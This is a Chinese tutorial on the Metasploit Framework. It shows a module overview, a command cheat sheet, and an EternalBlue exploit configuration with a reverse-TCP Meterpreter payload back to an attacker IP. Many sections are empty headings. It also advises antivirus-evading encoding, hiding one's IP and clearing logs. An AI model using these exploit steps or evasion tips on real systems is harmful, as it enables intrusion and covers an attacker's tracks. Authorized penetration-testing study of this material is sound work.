Metasploit Framework:渗透测试的开源利刃
于渗透测试的广袤战场之上,Metasploit Framework 宛如一把寒光凛凛、削铁如泥的开源利刃。作为业内首屈一指的强大框架,它全方位支持从漏洞利用、载荷生成,到权限提升与横向移动的全流程攻击模拟。本教程精心打磨,自安装配置起步,深度挖掘核心模块,详解漏洞利用技巧,阐述后渗透操作要点,并佐以丰富实战案例,全程搭配示例命令及输出展示。助力您将这把利刃牢牢握在手中,在网络安全攻防的较量中披荆斩棘,精准洞察系统薄弱环节,强化网络安全防护体系。
1. 安装与启动
1.1 安装方法
Kali Linux(预装):
其他系统:
1.2 启动与更新
2. 核心模块与命令
2.1 模块类型
模块类型 | 功能描述 |
---|---|
exploit | 漏洞利用代码 |
payload | 攻击成功后植入的恶意载荷 |
auxiliary | 辅助模块(扫描/嗅探等) |
post | 后渗透操作(提权/信息收集) |
encoder | 载荷编码(绕过杀软检测) |
2.2 常用命令速查表
命令 | 功能描述 |
---|---|
search <关键词> | 搜索模块(如 search eternalblue ) |
use <模块路径> | 加载模块(如 use exploit/windows/smb/ms17_010_eternalblue ) |
show options | 显示当前模块需配置的参数 |
set <参数> <值> | 设置参数(如 set RHOSTS 192.168.1.10 ) |
run 或 exploit | 执行模块 |
sessions -l | 列出所有活跃会话 |
sessions -i <ID> | 进入会话交互模式 |
3. 漏洞利用实战
案例 1:利用 EternalBlue(MS17-010)攻击 Windows 7
步骤 1:搜索并加载模块
步骤 2:配置参数
msf6 exploit(ms17_010_eternalblue) > show options
Module options:
RHOSTS 目标 IP(必填)
RPORT 445(默认 SMB 端口)
Payload options:
LHOST 攻击者 IP(用于反向连接)
LPORT 监听端口(默认 4444)
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.5
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
步骤 3:执行攻击
案例 2:利用 Web 漏洞(Apache Struts2 S2-045)
步骤 1:加载模块并配置
步骤 2:执行攻击
4. 后渗透操作(Meterpreter)
4.1 基础命令
命令 | 功能描述 |
---|---|
sysinfo | 查看系统信息 |
getuid | 查看当前用户权限 |
shell | 进入目标系统命令行 |
upload <本地文件> | 上传文件到目标 |
download <远程文件> | 从目标下载文件 |
screenshot | 截取屏幕 |
4.2 权限提升
4.3 持久化后门
5. 高级功能
5.1 载荷生成
5.2 绕过杀软(编码)
5.3 横向移动(Pass the Hash)
6. 综合实战案例
目标:内网渗透(Windows Server 2008 → 域控服务器)
信息收集:
横向移动:
域控提权:
7. 注意事项
合法授权:仅在授权范围内使用 Metasploit。
沙盒测试:未知漏洞代码先在隔离环境中验证。
流量隐蔽:使用
Proxychains
或VPN
隐藏真实 IP。日志清理:
评论